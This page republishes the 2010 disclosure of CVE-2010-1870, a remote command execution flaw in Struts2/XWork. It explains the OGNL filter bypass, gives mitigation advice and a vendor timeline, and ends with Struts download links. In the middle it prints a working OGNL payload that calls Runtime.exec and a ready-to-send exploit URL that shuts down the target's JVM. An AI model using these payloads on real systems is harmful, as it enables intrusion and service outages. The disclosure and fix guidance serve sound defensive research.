测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Friday, July 9, 2010
CVE-2010-1870: Struts2/XWork remote command execution
Update Tue Jul 13 2010: Added proof of concept
Apache Struts team has announced uploaded but has not released, due to
an unreasonably prolonged voting process, the 2.2.0 release of the
Struts2 web framework which fixes vulnerability that I've reported to
them on May 31st 2010. Apache Struts team is ridiculously slow in
releasing the fixed version and all of my attempts to expedite the
process have failed.
Introduction
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke
actions and call appropriate setters/getters based on HTTP parameter
names, which is achieved by treating each HTTP parameter name as an OGNL
statement. OGNL (Object Graph Navigation Language) is what turns:
user.address.city=Bishkek&user['favoriteDrink']=kumys
into
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed by the ParametersInterceptor, which calls
ValueStack.setValue() with user-supplied HTTP parameters as arguments.
NOTE: If you are using XWork's ParametersInterceptor or operate with
OGNL ValueStack in a similar way then you are vulnerable
(ParametersInterceptor is on by default in struts-default.xml).
In addition to property getting/setting, OGNL supports many more
features:
* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more...
Since HTTP parameter names are OGNL statements, to prevent an attacker
from calling arbitrary methods via HTTP parameters XWork has the
following two variables guarding methods execution:
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution'
(set to true by default)
* SecurityMemberAccess private field called
'allowStaticMethodAccess' (set to false by default)
OGNL Context variables
To make it easier for developer to access various frequently needed
objects XWork provides several predefined context variables:
* #application
* #session
* #request
* #parameters
* #attr
These variables represent various server-side objects, such as session
map. To prevent attackers from tampering with server-side objects
XWork's ParametersInterceptor disallowed # in parameter names. About a
year ago I found a way to bypass that protection(XW-641) using Java's
unicode String representation: \u0023. At the time I felt like the fix
that was implemented (OGNL value stack clearing) was insufficient, but
had not time to investigate this further.
CVE-2010-1870
Earlier this year I finally got a chance to look at this again and found
that in addition to the above mentioned context variables there were
more:
* #context - OgnlContext, the one guarding method execution based on
'xwork.MethodAccessor.denyMethodExecution' property value.
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess'
field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
You can probably see the problem already. Using XW-641 trick I was able
to modify the values that were guarding Java methods execution and run
arbitrary Java code:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
Actual proof of concept had to use OGNL's expression evaluation when
crafting HTTP request. PoC for this bug will be published on July 12
2010. To test whether your application is vulnerable you can use the
following proof of concept, which will call
java.lang.Runtime.getRuntime().exit(1):
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
Fixing CVE-2010-1870
Struts2 users must upgrade to the 2.2.0, which whitelists a set of
characters that excludes characters required to exploit this
vulnerability.
In cases where upgrade isn't possible you can use ParameterInterceptor's
"excludeParams" parameter to whitelist the characters required for your
application to operate correctly(usually A-z0-9_.'"[]) alternatively
you can blacklist \()@ which are the characters required to exploit this
bug.
Timeline
May 31st - email to
security@struts.apache.org
with vulnerability report.
June 4th - no response received, contacted developers again.
June 5th - had to find an XWork developer on IRC to look at this.
June 16th - Atlassian fixes vulnerability in its products. Atlassian and
Struts developers worked together in coming up with the fix.
June 20th - 1-line fix commited
June 29th - Struts 2.2.0 release voting process started and is still
going...
相关推荐
struts2 之xwork源码 供学习Struts2和Xwork的朋友使用
论坛系统(Struts 2+Hibernate+Spring实现)<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE validators SYSTEM ...
struts2_xwork2下载 http://struts.apache.org/2.0.14/index.html http://www.opensymphony.com/xwork/download.action
struts2下的Xwork2源文件 在 opensymphony开源社区http://www.opensymphony.com/ 可匿名使用SVN checkout xwork2的源代码 http://svn.opensymphony.com/svn/xwork/trunk
Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档
Struts2中xwork源码,希望对你们有所帮助。
Struts2 2.3.16xwork_doc 自己制作的xwork,如有错漏请见谅
<filter-name>struts2</filter-name> <filter-class> org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter </filter-class> </filter> <filter-mapping> <filter-name>struts2</filter-...
struts2-xwork-ognl的源文件(jar包),在eclipse中导入就可以直接在eclipse中查看对应的源代码,(注:现在下载的struts2的开发包已不自带此文件)免费的啊
最新版本的Struts2.2.3 以及Xwork的帮助文档
Struts2中xwork的源代码,学习Struts2的朋友一定要看看
最全的struts2.3和xwork2.chm中文帮助文档
struts2+xwork的源代码调试项目,包含简单的demo项目。次项目可直接导入eclispe、部署在服务器上要加入servlet-api.jar包的支持,此项目为研究源代码者提供,这也是个人好长时间自己探索出来的,希望大家努力。...
包含Struts2和Xwork的核心API,字体适中,方便阅读,chm格式,方便查询
struts2下的xwork源码 学习源代码,掌握struts2原理
这个压缩包包含struts-xwork-core的src源码,导入eclipse即可。
用Struts2新建一个应用的方法步骤用Struts2新建一个应用的方法步骤: 1.首先新建一个Web Project。File——new——Web Project,在Project Name中输入一个合法的名字。例如:struts2 2. 单击采单Window——...
struts2.2.1,xwork源码,一边看源码,一边看书,效果更好
struts2.1 xwork2.1帮助文档 java帮助文档